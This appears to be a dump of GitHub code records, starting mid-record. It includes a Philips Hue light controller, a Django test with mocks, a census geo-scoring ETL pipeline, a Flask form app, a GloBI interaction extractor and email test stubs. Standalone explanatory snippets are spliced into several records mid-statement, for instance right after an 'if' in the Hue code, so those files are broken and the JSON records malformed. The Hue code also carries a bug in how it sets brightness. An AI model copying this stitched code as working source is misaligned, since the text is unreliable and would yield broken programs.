str) -> str:\n if name not in self.light_map.keys():\n print(f'ERROR: Cannot find Light named {name}')\n exit(1)\n return str(self.light_map[name])\n\n def get_light_by_name(self, name: str) -> requests.Response:\n return requests.get(\n url=self._build_url(['lights', self._get_light_id(name)])\n )\n\n def turn_on_light(self, id: str, bright: int = None) -> requests.Response:\n body = {'on': True}\n if bright is not None:\n body['bri': self._clamp_brightness(bright)]\n return requests.put(\n url=self._build_url(['lights', id, 'state']),\n data=json.dumps(body)\n )\n\n def turn_off_light(self, id: str) -> requests.Response:\n return requests.put(\n url=self._build_url(['lights', id, 'state']),\n data=json.dumps({'on': False})\n )\n\n def _set_light_bright(self, id: str, bright: int) -> requests.Response:\n return requests.put(\n url=self._build_url(['lights', id, 'state']),\n data=json.dumps({'bri': bright})\n )\n\n def get_groups(self) -> requests.Response:\n return requests.get(\n url=self._build_url(['groups'])\n )\n\n def get_group_names(self) -> list:\n resp = self.get_groups()\n if 
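The controller maps a 0-100 percentage onto the bridge's 0-254 brightness range with a clamp; isolated and exercised with a few asserts, the helper mirrors _clamp_brightness above (a sketch, with illustrative test values):

    def clamp_brightness(percent: int) -> int:
        # scale 0-100% to the 0-254 range the Hue API expects, clamped
        return max(0, min(int(254 * (percent / 100)), 254))

    assert clamp_brightness(0) == 0
    assert clamp_brightness(50) == 127
    assert clamp_brightness(150) == 254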
resp.status_code != 200:\n print('Cannot reach Hue bridge to get Groups!')\n exit(1)\n return [group['name'] for group in resp.json().values()]\n\n def _get_group_id(self, name: str) -> str:\n group_name = self._group_name_from_alias(name)\n if group_name == '':\n print(f'ERROR: Cannot find Group named {name}')\n exit(1)\n return str(self.group_map[group_name])\n\n def _group_name_from_alias(self, alias: str) -> str:\n for group, aliases in self.group_aliases.items():\n if alias == group.lower() or alias in aliases:\n return group\n return ''\n\n def get_group_by_name(self, name: str) -> requests.Response:\n return requests.get(\n url=self._build_url(['groups', self._get_group_id(name)])\n )\n\n def turn_on_group(self, name: str, bright=None) -> requests.Response:\n # If we are setting the brightness, we should set all the lights\n # before turning them on, otherwise use previous brightness\n if bright is not None:\n bright = self._clamp_brightness(bright)\n else:\n bright = self._clamp_brightness(100)\n group = self.get_group_by_name(name).json()\n if not group['state']['all_on']:\n body = {'on': True, 'bri': self._clamp_brightness(bright)}\n requests.put(\n url=self._build_url(\n ['groups', self._get_group_id(name), 'action']\n ),\n data=json.dumps(body)\n )\n for light_id in group['lights']:\n resp = self._set_light_bright(light_id, bright)\n if resp.status_code != 200:\n print(f'ERROR: Could not access Light {light_id}')\n\n def turn_off_group(self, name: str) -> requests.Response:\n return requests.put(\n url=self._build_url(\n ['groups', self._get_group_id(name), 'action']\n ),\n data=json.dumps({'on': False})\n )\n","repo_name":"3digitdev/iota","sub_path":"iota/modules/PhilipsHue/HueController.py","file_name":"HueController.py","file_ext":"py","file_size_in_byte":5084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29031042857","text":"import mock\nimport pytest\n\n\n@pytest.mark.django_db\n@mock.patch('wiki.sync.cloud.views.create_organization.create_new_org_in_cloud')\n@mock.patch('wiki.sync.cloud.views.create_organization.ensure_cloud_org_in_connect')\ndef test_create_organization(ensure_org, _, client, wiki_users, groups):\n client.login(wiki_users.thasonic)\n\n dir_id = 1234\n ensure_org.return_value = dir_id\n\n response = client.post('/_api/svc/cloud/.create_organization', data={'org_name': 'my_org', 'user_iam_token': 'any'})\n assert response.status_code == 200, response.json()\n assert response.json()['data'] == {'success': True, 'org_id': dir_id}\n\n response = client.post('/_api/svc/cloud/.create_organization', data={'user_iam_token': 'any'})\n assert response.status_code == 409\n\n response = client.post('/_api/svc/cloud/.create_organization', data={'org_name': 'blabla'})\n assert response.status_code == 409\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"Intranet/wiki_tests/flavor_specific/biz/api_svc/test_create_organization.py","file_name":"test_create_organization.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3771372503","text":"import concurrent.futures\nimport math\nimport os\n\nimport geopandas as gpd\nimport numpy as np\nimport pandas as pd\nfrom data_pipeline.content.schemas.download_schemas import CSVConfig\nfrom data_pipeline.etl.base import ExtractTransformLoad\nfrom data_pipeline.etl.score import constants\nfrom data_pipeline.etl.score.etl_utils import 
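The wiki test above stubs its cloud backend with stacked mock.patch decorators so no real organization is created. A self-contained sketch of the same stubbing pattern using only the standard library; the create_org function here is illustrative, not part of that codebase:

    from unittest import mock

    def create_org():  # stand-in for a call that would hit an external API
        raise RuntimeError("no network in tests")

    with mock.patch(__name__ + ".create_org", return_value=1234) as fake:
        assert create_org() == 1234  # the patched stub answers instead
        fake.assert_called_once()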
check_score_data_source\nfrom data_pipeline.etl.sources.census.etl_utils import check_census_data_source\nfrom data_pipeline.score import field_names\nfrom data_pipeline.utils import get_module_logger\nfrom data_pipeline.utils import load_dict_from_yaml_object_fields\nfrom data_pipeline.utils import load_yaml_dict_from_file\nfrom data_pipeline.utils import zip_files\nfrom data_pipeline.etl.datasource import DataSource\n\nlogger = get_module_logger(__name__)\n\n\nclass GeoScoreETL(ExtractTransformLoad):\n \"\"\"\n A class used to generate per state and national GeoJson files with the score baked in\n \"\"\"\n\n def __init__(self, data_source: str = None):\n self.DATA_SOURCE = data_source\n self.SCORE_GEOJSON_PATH = self.DATA_PATH / \"score\" / \"geojson\"\n self.SCORE_LOW_GEOJSON = self.SCORE_GEOJSON_PATH / \"usa-low.json\"\n self.SCORE_HIGH_GEOJSON = self.SCORE_GEOJSON_PATH / \"usa-high.json\"\n\n self.SCORE_SHP_PATH = self.DATA_PATH / \"score\" / \"shapefile\"\n self.SCORE_SHP_FILE = self.SCORE_SHP_PATH / \"usa.shp\"\n\n self.SCORE_CSV_PATH = self.DATA_PATH / \"score\" / \"csv\"\n self.TILE_SCORE_CSV = self.SCORE_CSV_PATH / \"tiles\" / \"usa.csv\"\n\n self.CENSUS_USA_GEOJSON = (\n self.DATA_PATH / \"census\" / \"geojson\" / \"us.json\"\n )\n\n # Import the shortened name for Score N to be used on tiles.\n # We should no longer be using PFS\n\n ## TODO: We really should not have this any longer changing\n self.TARGET_SCORE_SHORT_FIELD = constants.TILES_SCORE_COLUMNS[\n field_names.FINAL_SCORE_N_BOOLEAN\n ]\n self.TARGET_SCORE_RENAME_TO = \"SCORE\"\n\n # Import the shortened name for tract (\"GTF\") that's used on the tiles.\n self.TRACT_SHORT_FIELD = constants.TILES_SCORE_COLUMNS[\n field_names.GEOID_TRACT_FIELD\n ]\n self.GEOMETRY_FIELD_NAME = \"geometry\"\n self.LAND_FIELD_NAME = \"ALAND10\"\n\n # We will adjust this upwards while there is some fractional value\n # in the score. 
This is a starting value.\n self.NUMBER_OF_BUCKETS = 10\n self.HOMOGENEITY_THRESHOLD = 200\n self.HIGH_LOW_ZOOM_CENSUS_TRACT_THRESHOLD = 150\n\n self.geojson_usa_df: gpd.GeoDataFrame\n self.score_usa_df: pd.DataFrame\n self.geojson_score_usa_high: gpd.GeoDataFrame\n self.geojson_score_usa_low: gpd.GeoDataFrame\n\n def get_data_sources(self) -> [DataSource]:\n return (\n []\n ) # we have all prerequisite sources locally as a result of generating the previous steps in the pipeline\n\n def extract(self, use_cached_data_sources: bool = False) -> None:\n\n # check census data\n check_census_data_source(\n census_data_path=self.DATA_PATH / \"census\",\n census_data_source=self.DATA_SOURCE,\n )\n\n # check score data\n check_score_data_source(\n score_csv_data_path=self.SCORE_CSV_PATH,\n score_data_source=self.DATA_SOURCE,\n )\n\n logger.info(\"Reading US GeoJSON (~6 minutes)\")\n full_geojson_usa_df = gpd.read_file(\n self.CENSUS_USA_GEOJSON,\n dtype={self.GEOID_FIELD_NAME: \"string\"},\n usecols=[\n self.GEOID_FIELD_NAME,\n self.GEOMETRY_FIELD_NAME,\n self.LAND_FIELD_NAME,\n ],\n low_memory=False,\n )\n\n # We only want to keep tracts to visualize that have non-0 land\n self.geojson_usa_df = full_geojson_usa_df[\n full_geojson_usa_df[self.LAND_FIELD_NAME] > 0\n ]\n\n logger.info(\"Reading score CSV\")\n self.score_usa_df = pd.read_csv(\n self.TILE_SCORE_CSV,\n dtype={\n self.TRACT_SHORT_FIELD: str,\n },\n low_memory=False,\n )\n\n def transform(self) -> None:\n # Rename GEOID10_TRACT to GEOID10 on score to allow merging with Census GeoJSON\n self.score_usa_df.rename(\n columns={self.TRACT_SHORT_FIELD: self.GEOID_FIELD_NAME},\n inplace=True,\n )\n\n logger.info(\"Pruning Census GeoJSON\")\n fields = [self.GEOID_FIELD_NAME, self.GEOMETRY_FIELD_NAME]\n\n # TODO update this join\n logger.info(\"Merging and compressing score csv with USA GeoJSON\")\n self.geojson_score_usa_high = self.score_usa_df.set_index(\n self.GEOID_FIELD_NAME\n ).merge(\n self.geojson_usa_df[fields].set_index(self.GEOID_FIELD_NAME),\n left_index=True,\n right_index=True,\n how=\"left\",\n )\n\n self.geojson_score_usa_high = gpd.GeoDataFrame(\n self.geojson_score_usa_high, crs=\"EPSG:4326\"\n )\n\n usa_simplified = self.geojson_score_usa_high[\n [\n self.TARGET_SCORE_SHORT_FIELD,\n self.GEOMETRY_FIELD_NAME,\n ]\n ].reset_index()\n\n usa_tracts = usa_simplified.rename(\n columns={self.TARGET_SCORE_SHORT_FIELD: self.TARGET_SCORE_RENAME_TO}\n )\n\n logger.info(\"Converting GeoJSON into GeoDataFrame with tracts\")\n usa_tracts = gpd.GeoDataFrame(\n usa_tracts,\n columns=[\n self.TARGET_SCORE_RENAME_TO,\n self.GEOMETRY_FIELD_NAME,\n self.GEOID_FIELD_NAME,\n ],\n crs=\"EPSG:4326\",\n )\n\n logger.debug(\"Creating buckets from tracts\")\n usa_bucketed, keep_high_zoom_df = self._create_buckets_from_tracts(\n usa_tracts, self.NUMBER_OF_BUCKETS\n )\n\n logger.debug(\"Aggregating buckets\")\n usa_aggregated = self._aggregate_buckets(usa_bucketed, agg_func=\"mean\")\n\n logger.debug(\"Breaking up polygons\")\n compressed = self._breakup_multipolygons(\n usa_aggregated, self.NUMBER_OF_BUCKETS\n )\n\n self.geojson_score_usa_low = self._join_high_and_low_zoom_frames(\n compressed, keep_high_zoom_df\n )\n\n # round to 2 decimals\n self.geojson_score_usa_low = self.geojson_score_usa_low.round(\n {self.TARGET_SCORE_RENAME_TO: 2}\n )\n\n def _create_buckets_from_tracts(\n self, initial_state_tracts: gpd.GeoDataFrame, num_buckets: int\n ):\n # First, we remove any states that have under the threshold of census tracts\n # from being aggregated 
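The bucketing step above sorts tracts by score and assigns equal-count buckets via floor(i / bucket_size). The same idea reduced to plain numpy, with toy scores and three buckets:

    import math
    import numpy as np

    scores = np.array([0.9, 0.1, 0.4, 0.7, 0.2, 0.8])
    num_buckets = 3
    bucket_size = math.ceil(len(scores) / num_buckets)
    order = np.argsort(scores)
    buckets = np.empty(len(scores), dtype=int)
    buckets[order] = [i // bucket_size for i in range(len(scores))]
    # lowest scores land in bucket 0, highest in bucket 2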
(right now, this just removes Wyoming)\n highzoom_state_tracts = initial_state_tracts.reset_index()\n highzoom_state_tracts[\"state\"] = highzoom_state_tracts[\n self.GEOID_FIELD_NAME\n ].str[:2]\n keep_high_zoom = highzoom_state_tracts.groupby(\"state\")[\n self.GEOID_FIELD_NAME\n ].transform(\n lambda x: x.count() <= self.HIGH_LOW_ZOOM_CENSUS_TRACT_THRESHOLD\n )\n assert (\n keep_high_zoom.sum() != initial_state_tracts.shape[0]\n ), \"Error: Cutoff is too high, nothing is aggregated\"\n assert keep_high_zoom.sum() > 1, \"Error: Nothing is kept at high zoom\"\n\n # Then we assign buckets only to tracts that do not get \"kept\" at high zoom\n state_tracts = initial_state_tracts[~keep_high_zoom].copy()\n state_tracts[f\"{self.TARGET_SCORE_RENAME_TO}_bucket\"] = np.arange(\n len(state_tracts)\n )\n # assign tracts to buckets by score\n state_tracts = state_tracts.sort_values(\n self.TARGET_SCORE_RENAME_TO, ascending=True\n )\n score_bucket = []\n bucket_size = math.ceil(\n len(state_tracts.index) / self.NUMBER_OF_BUCKETS\n )\n\n # This just increases the number of buckets so they are more\n # homogeneous. It's not actually necessary :shrug:\n while (\n state_tracts[self.TARGET_SCORE_RENAME_TO].sum() % bucket_size\n > self.HOMOGENEITY_THRESHOLD\n ):\n self.NUMBER_OF_BUCKETS += 1\n bucket_size = math.ceil(\n len(state_tracts.index) / self.NUMBER_OF_BUCKETS\n )\n\n logger.debug(\n f\"The number of buckets has increased to {self.NUMBER_OF_BUCKETS}\"\n )\n for i in range(len(state_tracts.index)):\n score_bucket.extend([math.floor(i / bucket_size)])\n state_tracts[f\"{self.TARGET_SCORE_RENAME_TO}_bucket\"] = score_bucket\n\n return state_tracts, initial_state_tracts[keep_high_zoom]\n\n def _aggregate_buckets(\n self, state_tracts: gpd.GeoDataFrame, agg_func: str\n ) -> gpd.GeoDataFrame:\n keep_cols = [\n self.TARGET_SCORE_RENAME_TO,\n f\"{self.TARGET_SCORE_RENAME_TO}_bucket\",\n self.GEOMETRY_FIELD_NAME,\n ]\n\n # We dissolve all other tracts by their score bucket\n state_dissolve = state_tracts[keep_cols].dissolve(\n by=f\"{self.TARGET_SCORE_RENAME_TO}_bucket\", aggfunc=agg_func\n )\n return state_dissolve\n\n def _breakup_multipolygons(\n self, state_bucketed_df: gpd.GeoDataFrame, num_buckets: int\n ) -> gpd.GeoDataFrame:\n\n compressed = []\n for i in range(num_buckets):\n for j in range(\n len(state_bucketed_df[self.GEOMETRY_FIELD_NAME][i].geoms)\n ):\n compressed.append(\n [\n state_bucketed_df[self.TARGET_SCORE_RENAME_TO][i],\n state_bucketed_df[self.GEOMETRY_FIELD_NAME][i].geoms[j],\n ]\n )\n return compressed\n\n def _join_high_and_low_zoom_frames(\n self, compressed: list, keep_high_zoom_df: gpd.GeoDataFrame\n ) -> gpd.GeoDataFrame:\n keep_columns = [\n self.TARGET_SCORE_RENAME_TO,\n self.GEOMETRY_FIELD_NAME,\n ]\n compressed_geodf = gpd.GeoDataFrame(\n compressed,\n columns=keep_columns,\n crs=\"EPSG:4326\",\n )\n return pd.concat([compressed_geodf, keep_high_zoom_df[keep_columns]])\n\n def load(self) -> None:\n # Create separate threads to run each write to disk.\n def write_high_to_file():\n logger.info(\"Writing usa-high (~9 minutes)\")\n\n self.geojson_score_usa_high.to_file(\n filename=self.SCORE_HIGH_GEOJSON,\n driver=\"GeoJSON\",\n )\n logger.info(\"Completed writing usa-high\")\n\n def write_low_to_file():\n logger.info(\"Writing usa-low (~9 minutes)\")\n self.geojson_score_usa_low.to_file(\n filename=self.SCORE_LOW_GEOJSON, driver=\"GeoJSON\"\n )\n logger.info(\"Completed writing usa-low\")\n\n def create_esri_codebook(codebook) -> pd.DataFrame:\n \"\"\"temporary: helper to make 
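The dissolve call above unions the geometries within each score bucket and aggregates the remaining columns with the given function. A toy example of that call, with shapely circles standing in for tract polygons:

    import geopandas as gpd
    from shapely.geometry import Point

    gdf = gpd.GeoDataFrame(
        {"SCORE": [0.2, 0.4, 0.9], "bucket": [0, 0, 1]},
        geometry=[Point(0, 0).buffer(1), Point(3, 0).buffer(1), Point(6, 0).buffer(1)],
    )
    merged = gdf.dissolve(by="bucket", aggfunc="mean")
    # one row per bucket: unioned geometry plus the mean SCORE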
a codebook for esri shapefile only\"\"\"\n\n shapefile_column_field = \"shapefile_column\"\n internal_column_name_field = \"column_name\"\n column_description_field = \"column_description\"\n\n logger.info(\"Creating an ESRI codebook with shortened column names\")\n codebook = (\n pd.Series(codebook)\n .reset_index()\n .rename(\n columns={\n 0: internal_column_name_field,\n \"index\": shapefile_column_field,\n }\n )\n )\n\n # open yaml config\n downloadable_csv_config = load_yaml_dict_from_file(\n self.CONTENT_CONFIG / \"csv.yml\", CSVConfig\n )\n column_rename_dict = load_dict_from_yaml_object_fields(\n yaml_object=downloadable_csv_config[\"fields\"],\n object_key=\"score_name\",\n object_value=\"label\",\n )\n\n codebook[column_description_field] = codebook[\n internal_column_name_field\n ].map(column_rename_dict)\n\n codebook = codebook[\n [\n shapefile_column_field,\n internal_column_name_field,\n column_description_field,\n ]\n ]\n logger.info(\"Completed creating ESRI codebook\")\n\n return codebook\n\n def combine_esri_codebook_with_original_codebook(esri_codebook_df):\n \"\"\"Combines the ESRI codebook generated above with the original codebook generated\n during score-post. Essentially we want to include the shapefile column name in the\n original codebook.\"\"\"\n\n logger.info(\"Combining ESRI codebook with original codebook\")\n\n # load up the original codebook\n original_codebook_df = pd.read_csv(\n constants.SCORE_DOWNLOADABLE_CODEBOOK_FILE_PATH,\n low_memory=False,\n )\n\n # if we've already combined these files in the past, go ahead and remove the columns so we can do it again\n original_codebook_df.drop(\n \"shapefile_label\", axis=1, errors=\"ignore\", inplace=True\n )\n\n # add the esri (shapefile) columns to the original codebook by joining the two dataframes\n combined_codebook_df = original_codebook_df.merge(\n esri_codebook_df[[\"shapefile_column\", \"column_name\"]],\n how=\"outer\",\n left_on=\"Description\",\n right_on=\"column_name\",\n )\n\n # if any descriptions are blank, replace them with the column_name description from the esri codebook\n combined_codebook_df[\"Description\"].mask(\n combined_codebook_df[\"Description\"].isnull(),\n combined_codebook_df[\"column_name\"],\n inplace=True,\n )\n combined_codebook_df = combined_codebook_df.drop(\n \"column_name\", axis=1\n )\n\n # move some stuff around to make it easier to read the output\n shapefile_col = combined_codebook_df.pop(\"shapefile_column\")\n combined_codebook_df.insert(2, \"shapefile_label\", shapefile_col)\n\n # save the combined codebook\n combined_codebook_df.to_csv(\n constants.SCORE_DOWNLOADABLE_CODEBOOK_FILE_PATH, index=False\n )\n logger.info(\n \"Completed combining ESRI codebook with original codebook\"\n )\n\n def write_esri_shapefile():\n logger.info(\"Producing ESRI shapefiles\")\n # Note that esri shapefiles can't have long column names, so we borrow from the\n # shorten some tile names (renaming map) and print out a codebook for the user\n codebook = {}\n renaming_map = {}\n\n # allows us to quickly rename / describe columns\n reversed_tiles = {\n short: long\n for long, short in constants.TILES_SCORE_COLUMNS.items()\n }\n\n for i, column in enumerate(self.geojson_score_usa_high.columns):\n # take first 6 characters and add a number to ensure uniqueness\n # this is the max due to esri (index can be 3-digits)\n if len(column) > 10:\n new_col = column[:6] + f\"_{i}\"\n else:\n new_col = column\n codebook[new_col] = reversed_tiles.get(column, column)\n if new_col != column:\n 
renaming_map[column] = new_col\n\n self.geojson_score_usa_high.rename(columns=renaming_map).to_file(\n self.SCORE_SHP_FILE\n )\n logger.info(\"Completed writing shapefile\")\n\n esri_codebook_df = create_esri_codebook(codebook)\n combine_esri_codebook_with_original_codebook(esri_codebook_df)\n\n arcgis_zip_file_path = self.SCORE_SHP_PATH / \"usa.zip\"\n arcgis_files = []\n for file in os.listdir(self.SCORE_SHP_PATH):\n # don't remove __init__ files as they conserve dir structure\n if file != \"__init__.py\":\n arcgis_files.append(self.SCORE_SHP_PATH / file)\n arcgis_files.append(constants.SCORE_DOWNLOADABLE_CODEBOOK_FILE_PATH)\n zip_files(arcgis_zip_file_path, arcgis_files)\n logger.info(\"Completed zipping shapefiles\")\n\n # Per #1557:\n # Zip file that contains the shapefiles, codebook and checksum file.\n # Normally we get the codebook file path using this constant:\n # - codebook_path = constants.SCORE_DOWNLOADABLE_CODEBOOK_FILE_PATH\n # However since we generate it on a separate script (etl_score_post)\n # the time stamp can be generated again, and thus the file is not found.\n # So we grab it from the downloadable dir and if we don't find it, it\n # means we haven't run etl_score_post, and continue\n\n logger.info(\"Getting codebook from downloadable dir\")\n codebook_path = None\n for file in os.listdir(constants.SCORE_DOWNLOADABLE_DIR):\n if \"codebook\" in file:\n codebook_path = constants.SCORE_DOWNLOADABLE_DIR / file\n\n if codebook_path:\n version_shapefile_codebook_zip_path = (\n constants.SCORE_VERSIONING_SHAPEFILE_CODEBOOK_FILE_PATH\n )\n readme_path = constants.SCORE_VERSIONING_README_FILE_PATH\n\n logger.info(\"Compressing shapefile and codebook files\")\n files_to_compress = [\n arcgis_zip_file_path,\n codebook_path,\n readme_path,\n ]\n zip_files(\n version_shapefile_codebook_zip_path, files_to_compress\n )\n\n with concurrent.futures.ThreadPoolExecutor() as executor:\n futures = {\n executor.submit(task)\n for task in [\n write_high_to_file,\n write_low_to_file,\n write_esri_shapefile,\n ]\n }\n\n for fut in concurrent.futures.as_completed(futures):\n # Calling result will raise an exception if one occurred.\n # Otherwise, the exceptions are silently ignored.\n fut.result()\n","repo_name":"usds/justice40-tool","sub_path":"data/data-pipeline/data_pipeline/etl/score/etl_score_geo.py","file_name":"etl_score_geo.py","file_ext":"py","file_size_in_byte":18563,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"3"} +{"seq_id":"12240950554","text":"from flask import Flask, redirect, url_for,render_template,request\r\nimport json\r\nimport schedule as sh\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef form():\r\n return render_template(\"try.html\")\r\n\r\n@app.route('/success',methods=[\"POST\"])\r\ndef success():\r\n user=request.form[\"txt_user\"]\r\n profile=request.form[\"txt_profile\"]\r\n sd=request.form[\"txt_sd\"]\r\n ed=request.form[\"txt_ed\"]\r\n sh.all_operations(user,profile,sd,ed)\r\n return redirect(\"/display\") \r\n\r\n@app.route('/display',methods=[\"GET\"])\r\ndef display():\r\n with open(\"dictionary_list.json\") as f:\r\n data=json.load(f)\r\n return render_template(\"display.html\",data=data)\r\n\r\n@app.route('/success2',methods=[\"POST\"])\r\ndef success2():\r\n with open(\"dictionary_list.json\") as f:\r\n data=json.load(f)\r\n return render_template(\"display.html\",data=data)\r\nif __name__ == '__main__':\r\n app.run(debug = 
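The load step above fans its writers out on a thread pool and calls result() on each completed future so worker exceptions surface instead of being silently dropped. The pattern in isolation, with a deliberately failing task:

    import concurrent.futures

    def work(n):
        if n == 2:
            raise ValueError("boom")
        return n * n

    with concurrent.futures.ThreadPoolExecutor() as pool:
        futures = {pool.submit(work, n) for n in range(4)}
        for fut in concurrent.futures.as_completed(futures):
            try:
                print(fut.result())  # re-raises the worker's exception here
            except ValueError as exc:
                print("worker failed:", exc)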
True)","repo_name":"Poonam-cyber/Flask","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38917871630","text":"# This code runs for about 10 minutes.\n\nimport csv\nimport itertools\nfrom time import gmtime, strftime\n\nno_ott_source = 0\nno_ott_target = 0\n\ndef main():\n global no_ott_source\n global no_ott_target\n print(strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()))\n print('-------------------')\n\n filepath = \"./data/GloBI_Dump/interactions.tsv\"\n parasite_source = [\"parasiteOf\", \"pathogenOf\"]\n parasite_target = [\"hasParasite\", \"hasPathogen\"]\n freeliving_source = [\"preysOn\", \"eats\", \"flowersVisitedBy\", \"hasPathogen\", \"pollinatedBy\", \"hasParasite\", \"hostOf\"]\n freeliving_target = [\"preyedUponBy\", \"parasiteOf\", \"visitsFlowersOf\", \"pathogenOf\", \"hasHost\"]\n # [[\"ott_id\",\"taxon_name\"]]\n freelivings = []\n parasites = []\n \n freelivings_path = './data/interaction_data/freelivings.csv' \n parasites_path = './data/interaction_data/parasites.csv' \n\n index = 0\n\n with open(filepath, \"r\", encoding=\"utf8\") as tsv_file:\n reader = csv.reader(tsv_file, delimiter='\\t')\n for row in reader:\n index += 1\n interaction = row[10]\n # eliminate useless interactions\n # -------------------------------- source? --------------------------------\n if any(interaction in source for source in (freeliving_source, parasite_source)):\n if row[0] == '' or not 'OTT' in row[0]:\n print('no ott available')\n else:\n ott = row[0].split(':')\n name = row[1]\n # normal case (otherwise no ott available, but maybe another one):\n if len(ott) >= 2:\n if interaction in freeliving_source:\n freelivings.append([ott[1], name, interaction])\n elif interaction in parasite_source:\n parasites.append([ott[1], name, interaction])\n # -------------------------------- target? 
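The disambiguate_list helper in this GloBI script deduplicates its row lists by sorting and collapsing adjacent duplicates with itertools.groupby, which works on lists of lists (unhashable, so a plain set would require converting rows to tuples first). Minimal form:

    import itertools

    rows = [["1", "a"], ["2", "b"], ["1", "a"]]
    rows.sort()
    deduped = [row for row, _ in itertools.groupby(rows)]
    assert deduped == [["1", "a"], ["2", "b"]]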
--------------------------------\n if any(interaction in target for target in (freeliving_target, parasite_target)):\n if row[11] == '' or not 'OTT' in row[11]:\n print('no ott available')\n else:\n ott = row[11].split(':')\n name = row[12]\n # normal case (otherwise no ott available, but maybe another one):\n if len(ott) >= 2:\n if interaction in freeliving_target:\n freelivings.append([ott[1], name, interaction])\n elif interaction in parasite_target:\n parasites.append([ott[1], name, interaction])\n\n print('-------------------')\n print(strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()))\n print('-------------------')\n print('tsv_len =', index)\n print('no ott source:', no_ott_source)\n print('no ott target:', no_ott_target)\n\n freelivings = disambiguate_list(freelivings, 'freelivings')\n parasites = disambiguate_list(parasites, 'parasites')\n\n # -------------------------------------------------\n with open(freelivings_path, \"w\") as f:\n writer = csv.writer(f)\n writer.writerows(freelivings)\n\n with open(parasites_path, \"w\") as f:\n writer = csv.writer(f)\n writer.writerows(parasites)\n # -------------------------------------------------\n print('-------------------')\n print(strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()))\n return\n\ndef is_int(value):\n try: \n int(value)\n return True\n except ValueError:\n return False\n\ndef disambiguate_list(current_list, name):\n print('number of', name, ':', len(current_list))\n current_list.sort()\n current_list = list(current_list for current_list,_ in itertools.groupby(current_list))\n print('number of', name, ':', len(current_list), '(distinct)')\n return current_list\n\nmain()\n","repo_name":"Irallia/IZW-HU-Parasites","sub_path":"code/metadata/extract_globi_data.py","file_name":"extract_globi_data.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"8005128532","text":"import matplotlib.pyplot as plt\n\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn import linear_model\n\n\nclass Regression:\n def linear_regression(x, y, ind):\n lm = linear_model.LinearRegression()\n model = lm.fit(np.array(x).reshape(-1, 1), np.array(y).reshape(-1, 1))\n\n slope = lm.coef_\n intercept = lm.intercept_\n prediction = slope * ind + intercept\n\n regression = [\n lm.coef_,\n lm.intercept_,\n lm.score(np.array(x).reshape(-1, 1), np.array(y).reshape(-1, 1)),\n prediction,\n ]\n\n return regression\n\n def plot(x, y, y1):\n plt.plot(x, y, \"o-\")\n plt.plot(x, y1, \"x-\")\n plt.xticks(range(min(x), max(x) + 1))\n plt.title(\"GA Progress Over Generations\")\n plt.ylabel(\"Game Score\")\n plt.xlabel(\"Epoch\")\n\n plt.savefig(\"Graph\")\n","repo_name":"kb1900/Cultris-Tetris-AI","sub_path":"c2ai/learning/deap/pso/downstack/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"73992808082","text":"import os\n\nfrom django.core.files.uploadedfile import SimpleUploadedFile\nfrom django.conf import settings\nfrom django.core.mail.backends.base import BaseEmailBackend\n\n\ndef create_upload_image():\n fixture_path = os.path.join(settings.BASE_DIR, 'emails', 'tests',\n 'fixtures', 'test.jpg')\n raw_file = open(fixture_path, 'rb')\n uploaded_image = SimpleUploadedFile(\n 'test.jpg',\n raw_file.read()\n )\n raw_file.close()\n uploaded_image.content_type = 'image/jpeg'\n return uploaded_image\n\n\ndef create_upload_file(path, content):\n raw_file 
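The linear_regression helper above reshapes its 1-D arrays to column vectors because scikit-learn expects X with shape (n_samples, n_features). Reduced to essentials, with illustrative data:

    import numpy as np
    from sklearn import linear_model

    x = np.array([1, 2, 3, 4])
    y = np.array([2.1, 3.9, 6.2, 8.1])
    lm = linear_model.LinearRegression()
    lm.fit(x.reshape(-1, 1), y)         # X must be 2-D; y may stay 1-D
    pred = lm.predict(np.array([[5]]))  # slope * 5 + intercept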
= open(path, 'w')\n raw_file.write(content)\n raw_file.close()\n raw_file = open(path, 'rb')\n uploaded_file = SimpleUploadedFile(\n path.split('/')[-1],\n raw_file.read()\n )\n raw_file.close()\n return uploaded_file\n\n\ndef get_jpg_content():\n fixture_path = os.path.join(settings.BASE_DIR, 'emails', 'tests',\n 'fixtures', 'test.jpg')\n raw_file = open(fixture_path, 'rb')\n return raw_file.read()\n\n\nclass EmailBackendMockSuccess(BaseEmailBackend):\n response = None\n\n def send_messages(self, email_messages):\n for msg in email_messages:\n msg.response_content = [{'id': '348dj38dj28do5jd82'}]\n\n\nclass EmailBackendMockFailure(BaseEmailBackend):\n response = None\n\n def send_messages(self, email_messages):\n for msg in email_messages:\n msg.response_content = None\n\n\nclass ResponseManagerStub(object):\n def process_response(self, email, entry):\n if email.response_content is not None:\n entry.thirdparty_id = email.response_content[0]['id']\n return True\n return False\n\n\nclass EmailBackendMockReject(BaseEmailBackend):\n response = None\n\n def send_messages(self, email_messages):\n for msg in email_messages:\n msg.response_content = [{'rejected_because': 'potato'}]\n\n\nclass ResponseManagerRejectStub(object):\n def process_response(self, email, entry):\n entry.thirdparty_reject = email.response_content[0]['rejected_because']\n return False\n","repo_name":"qdqmedia/leela","sub_path":"emails/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"72192390803","text":"import numpy as np\n\nclass OrderedVector:\n\n def __init__(self, capacity):\n self.capacity = capacity\n self.last_position = -1\n self.values = np.empty(self.capacity, dtype=int)\n\n # O(n)\n def imprime(self):\n if self.last_position == -1:\n print('O vetor está vazio')\n else:\n for i in range(self.last_position + 1):\n print(i, ' - ', 